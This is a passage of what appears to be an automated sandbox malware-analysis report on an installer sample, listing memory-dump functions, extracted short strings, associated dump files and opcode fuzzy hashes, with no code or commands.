tu, xrefs: 0BC9C7BB

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: eg$jz$ol$tu$tz
API String ID: 0-694401479
Opcode ID: 18ef46ec62d27a867501333ab94f59a9a2339d6e7a2c33e2ed89e8d392a4d5bf
Instruction ID: 599a339b019442bb83e0dad3079addf00affdc964a4719888abe23bcf355f97e
Opcode Fuzzy Hash: 18ef46ec62d27a867501333ab94f59a9a2339d6e7a2c33e2ed89e8d392a4d5bf
Instruction Fuzzy Hash: 7EC1FDB5A293108BD720CF28D85176BB7E1FF82754F08991CE8959B391E778CA04C796

Function 0BC95F2C Relevance: 6.5, Strings: 5, Instructions: 279COMMON

Download Yara Rule

Strings

1D6J, xrefs: 0BC95F43
.L R, xrefs: 0BC95F53
mX|^, xrefs: 0BC95F6B
cTbZ, xrefs: 0BC95F63
H?N, xrefs: 0BC95F4B

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: H?N$.L R$1D6J$cTbZ$mX|^
API String ID: 0-4129960884
Opcode ID: 1a700fb37b2fb5ca3769d43321f3f3b024b0a0fc2c437ff038eb4697c9187233
Instruction ID: 11ccee58eb8f7503effd2a7fc86b098bb9bc1c5baa45d25212421d87cb194cc3
Opcode Fuzzy Hash: 1a700fb37b2fb5ca3769d43321f3f3b024b0a0fc2c437ff038eb4697c9187233
Instruction Fuzzy Hash: 8C9167759183228BD724CF28C89036BB7F2FFD4754F09866DE8C55B2A5E7748606CB82

Function 0BCAFE2D Relevance: 5.2, Strings: 4, Instructions: 221COMMON

Download Yara Rule

Strings

v#, xrefs: 0BCAFEA8
aaoh, xrefs: 0BCAFEA1
Ubmo, xrefs: 0BCAFE9A
ajjg, xrefs: 0BCAFE8C

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: Ubmo$aaoh$ajjg$v#
API String ID: 0-1084779451
Opcode ID: f20c9cd7e4d4874eb8b9c000d575fbbc2950f7995fb023df5dda1ee5f33e9c53
Instruction ID: 2ce86732e7a6c45823eea1f1af2b995a800f7fca3f0f59f2bed95988cd5d057a
Opcode Fuzzy Hash: f20c9cd7e4d4874eb8b9c000d575fbbc2950f7995fb023df5dda1ee5f33e9c53
Instruction Fuzzy Hash: 6171D4756147418FE325CF29C892B23BBE1FF56308F28846CD5AACB692C776E4028B50

Function 0BCBBCE0 Relevance: 4.6, Strings: 3, Instructions: 894COMMON

Download Yara Rule

Strings

sW!, xrefs: 0BCBBF90
]yt, xrefs: 0BCBBFA0
kh, xrefs: 0BCBC3C8

Memory Dump Source

Source File: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: ]yt$kh$sW!
API String ID: 0-622500489
Opcode ID: 5640534cd7fc8f605475cc3e7bf91f2134296bcee36c467924f7e7b716089485
Instruction ID: b65933aaaa849982ef560a847fe17585c7fbe984091234da98251b8385315a7e
Opcode Fuzzy Hash: 5640534cd7fc8f605475cc3e7bf91f2134296bcee36c467924f7e7b716089485
Instruction Fuzzy Hash: 07520D726193418FD314CF68C885BAFBBE1EBC5314F148A2CE5A987391D778D909CB92

Function 0BCBF640 Relevance: 4.3, Strings: 3, Instructions: 554COMMON

Download Yara Rule

Strings

f, xrefs: 0BCBF8CD
S"(w, xrefs: 0BCBF740
S"(w, xrefs: 0BCBF96C

Memory Dump Source

Source File: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: S"(w$S"(w$f
API String ID: 0-891790955
Opcode ID: 4ad892aef27a42c037d5a2dee02a8d1660961c2b1574c7fcb458808e1e8738c3
Instruction ID: 77e4d2e7e41e488dc35a00ee440ab786012d9c742afbef52a8726aca0f48e176
Opcode Fuzzy Hash: 4ad892aef27a42c037d5a2dee02a8d1660961c2b1574c7fcb458808e1e8738c3
Instruction Fuzzy Hash: EB12E0706193409FD324CF29CC90B6FBBE1BB89314F188A2DE9E5473A1D3719945CB92

Function 0BC88C80 Relevance: 4.2, Strings: 3, Instructions: 411COMMON

Download Yara Rule

Strings

[ldo, xrefs: 0BC88F80, 0BC88F87, 0BC88FF0
de, xrefs: 0BC890A7
s`k\, xrefs: 0BC88E59

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: [ldo$de$s`k\
API String ID: 0-2349903483
Opcode ID: 77d662ea27949e0536cc581ea8a3930c973452413b361eed4ad9ce43be0806c0
Instruction ID: 6c5f739390a4fdee073d2ad9a9355b6300ea0cbab3aa52ab2b22a83ce13f5ead
Opcode Fuzzy Hash: 77d662ea27949e0536cc581ea8a3930c973452413b361eed4ad9ce43be0806c0
Instruction Fuzzy Hash: D8D1D3B151C3808FD724DF24C8957AFBBE1EF92314F14892DE0D98B291DB789509CB66

Function 0BC88840 Relevance: 4.1, Strings: 3, Instructions: 367COMMON

Download Yara Rule

Strings

F=KJ, xrefs: 0BC8887F
[Z, xrefs: 0BC88A17
5N41, xrefs: 0BC8888F

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: 5N41$F=KJ$[Z
API String ID: 0-4279203989
Opcode ID: b1d7770ae8a4172844e4cc52a891f4b21d28208299c2665afff8874d745cc20d
Instruction ID: 61a269e4d86d8bd0dc5ba28d8cbde8682f1eecb88b4e669f306f711ec5a85474
Opcode Fuzzy Hash: b1d7770ae8a4172844e4cc52a891f4b21d28208299c2665afff8874d745cc20d
Instruction Fuzzy Hash: DCB1D37165D3C18AD3219F2984903ABFFE0AFD3648F48496CE4D15B782C77A850AC796

Function 0BC95A69 Relevance: 4.1, Strings: 3, Instructions: 307COMMON

Download Yara Rule

Strings

M, xrefs: 0BC95C23
PV, xrefs: 0BC95AC2
T*, xrefs: 0BC95ACA

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: M$PV$T*
API String ID: 0-293223115
Opcode ID: afe005d9a34a947db4e72d112e91a2a1e948685156c5542589fbf995054cd6ef
Instruction ID: cb0abbe07503d35ca5e4af01103157316766903eb52a6da424b9c4ce8f4dc89f
Opcode Fuzzy Hash: afe005d9a34a947db4e72d112e91a2a1e948685156c5542589fbf995054cd6ef
Instruction Fuzzy Hash: 9C9178729193228BD724CF28C49136BB7E1FFE5750F19892DE8C51B360EB348906C786

Function 0BC9B913 Relevance: 4.0, Strings: 3, Instructions: 245COMMON

Download Yara Rule

Strings

=:, xrefs: 0BC9B933
SP, xrefs: 0BC9BB62
x~, xrefs: 0BC9BB12

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: =:$SP$x~
API String ID: 0-689967048
Opcode ID: c62c162084bb1f4cc2b7bbc60454977cccb3bd1220dcbb1763125ec2ad40c41f
Instruction ID: 5f9a60cba6607a6b830264f39a2fde33c5ed57b7ccbab1133567452a3857a381
Opcode Fuzzy Hash: c62c162084bb1f4cc2b7bbc60454977cccb3bd1220dcbb1763125ec2ad40c41f
Instruction Fuzzy Hash: 1D81AC7269C340AED700DF64D8516AFFBE2EBD5308F08982CE1C48B362DA758619CB56

Function 0BC99110 Relevance: 3.4, Strings: 2, Instructions: 883COMMON

Download Yara Rule

Strings

h', xrefs: 0BC991B0
30, xrefs: 0BC9942F

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: 30$h'
API String ID: 0-749944910
Opcode ID: 7ad017a8e85ae95fca91f64dfb94ab7966601d886322a24f57bfa047954b770a
Instruction ID: 51ff2f494aca73b4ff01499b584eff34dc480ce2c97a6c3a0f02f865e60e1139
Opcode Fuzzy Hash: 7ad017a8e85ae95fca91f64dfb94ab7966601d886322a24f57bfa047954b770a
Instruction Fuzzy Hash: 1F6223746193009BFB248F26EC48B2BBBE2FBD5714F548A1CE4E5972A1D3B0D945CB42

Function 0BC84230 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

8, xrefs: 0BC84B43
0, xrefs: 0BC84B4B

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 912f9db0c00a0ed7bbff35021ac0b58e92d7ef514b03f54863f673fac4e8ec5a
Instruction ID: 280b716fa656170c29b7e8cac2436438772de651dc89db4d7d882af569b21c0d
Opcode Fuzzy Hash: 912f9db0c00a0ed7bbff35021ac0b58e92d7ef514b03f54863f673fac4e8ec5a
Instruction Fuzzy Hash: 2C7256715193419FD718DF18C880BAEBBE1BF88318F04892DF9998B391D375DA58CB92

Function 0BCA1C70 Relevance: 3.1, Strings: 2, Instructions: 583COMMON

Download Yara Rule

Strings

SPQ, xrefs: 0BCA1E44
XYZ[, xrefs: 0BCA1EE8

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: SPQ$XYZ[
API String ID: 0-2567395215
Opcode ID: 9b4486ebbd0ac1e9ace3e44d7f82ba86eb0b41c2b6776d13723a6d2327dbdcc4
Instruction ID: b9cb03aa1a75c86f74188a941fead71b6102bf9fc0df9e940a6484191ef2bec0
Opcode Fuzzy Hash: 9b4486ebbd0ac1e9ace3e44d7f82ba86eb0b41c2b6776d13723a6d2327dbdcc4
Instruction Fuzzy Hash: 9302F072A183518FD718CF69C89176BB7E2EFC5314F08892CE9959B380E778D905CB92

Function 0BCB055A Relevance: 2.9, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

]J@7, xrefs: 0BCB05F6
W]XR, xrefs: 0BCB08A4

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: W]XR$]J@7
API String ID: 0-1468689549
Opcode ID: 92ee61aa5360c6db6bc4cd9a7c0cf9b49eed20e26dc4c1204800590c7974b5f3
Instruction ID: dcbfe80ce6e80c9d85ca0eff47307be3f433315d0a7a6993c2f29a90a7a8bd0e
Opcode Fuzzy Hash: 92ee61aa5360c6db6bc4cd9a7c0cf9b49eed20e26dc4c1204800590c7974b5f3
Instruction Fuzzy Hash: 7FC19EB05057828FE719CF29C0A0767FBE0AF56304F1885ADC49A8F792D37AD546CB94

Function 0BCAF7AC Relevance: 2.9, Strings: 2, Instructions: 376COMMON

Download Yara Rule

Strings

]J@7, xrefs: 0BCB05F6
W]XR, xrefs: 0BCB08A4

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: W]XR$]J@7
API String ID: 0-1468689549
Opcode ID: b246c857cceb7d8378e299c690ea7688182f0f537074f42cf6ec700f4cf341fa
Instruction ID: b49e375abe24ead36dd8a3d43caa81735654f2b85107d43e6b1d0880c93a7f4a
Opcode Fuzzy Hash: b246c857cceb7d8378e299c690ea7688182f0f537074f42cf6ec700f4cf341fa
Instruction Fuzzy Hash: 2AB1CEB06057828FE719CF29C4A0B67FBE0AF56304F1885ADC49A8F752D37AD506CB94

Function 0BCBCA50 Relevance: 2.9, Strings: 2, Instructions: 372COMMON

Download Yara Rule

Strings

h, xrefs: 0BCBCCD8
NP,?, xrefs: 0BCBCC40

Memory Dump Source

Source File: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: NP,?$h
API String ID: 0-378862781
Opcode ID: 02944c913184db388e26183e6f85bcc4bbf0a679ec6874b2abc21126e1ddff1e
Instruction ID: 1fefd34c1f543bc6fb75dd93e8f2da8ec809404a7cefadb00a4e06ee0ad4ca8b
Opcode Fuzzy Hash: 02944c913184db388e26183e6f85bcc4bbf0a679ec6874b2abc21126e1ddff1e
Instruction Fuzzy Hash: 5B915375A292109FD710CF35CCC0FAFBBA6EBC9720F148728E9A957291D330A9418791

Function 0BCA86F0 Relevance: 2.9, Strings: 2, Instructions: 372COMMON

Download Yara Rule

Strings

MIJK, xrefs: 0BCA8912, 0BCA8958
8', xrefs: 0BCA8888

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: 8'$MIJK
API String ID: 0-2815066038
Opcode ID: b4155ba650307aa3cc98f8c70239118608c8d175664d3393da1af9cb427b7681
Instruction ID: 7a06b13ebd8369497af854c197ac46c4395da2fb70793bd05be1bffdea263586
Opcode Fuzzy Hash: b4155ba650307aa3cc98f8c70239118608c8d175664d3393da1af9cb427b7681
Instruction Fuzzy Hash: 75B155B2B243019BD310CF79CC8172BB7E2EFC5718F09863CE9A997284E77499058792

Function 0BC972F2 Relevance: 2.8, Strings: 2, Instructions: 258COMMON

Download Yara Rule

Strings

>?, xrefs: 0BC974FC
PsLm, xrefs: 0BC97525

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: >?$PsLm
API String ID: 0-1445525898
Opcode ID: 76ddfdc12c28f0f8c0fca10617bdacecfb5b1a828079699453cead5221bb9963
Instruction ID: e320b0fbb8a721c756cefa2d3acbe44e4053e84bb99b92f227141271af129631
Opcode Fuzzy Hash: 76ddfdc12c28f0f8c0fca10617bdacecfb5b1a828079699453cead5221bb9963
Instruction Fuzzy Hash: 5F918AB05293408FE724CF14C4A9B6BBBF0FF82314F05594DE49A4F6A1E3798949CB96

Function 0BCAF13B Relevance: 2.8, Strings: 2, Instructions: 257COMMON

Download Yara Rule

Strings

';/8, xrefs: 0BCAFB88
&8nu, xrefs: 0BCAFAD8

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: &8nu$';/8
API String ID: 0-3660093508
Opcode ID: 7434599c1214809aedf1089a73b70fba422e432ea8e9d93c90f431a6119cc987
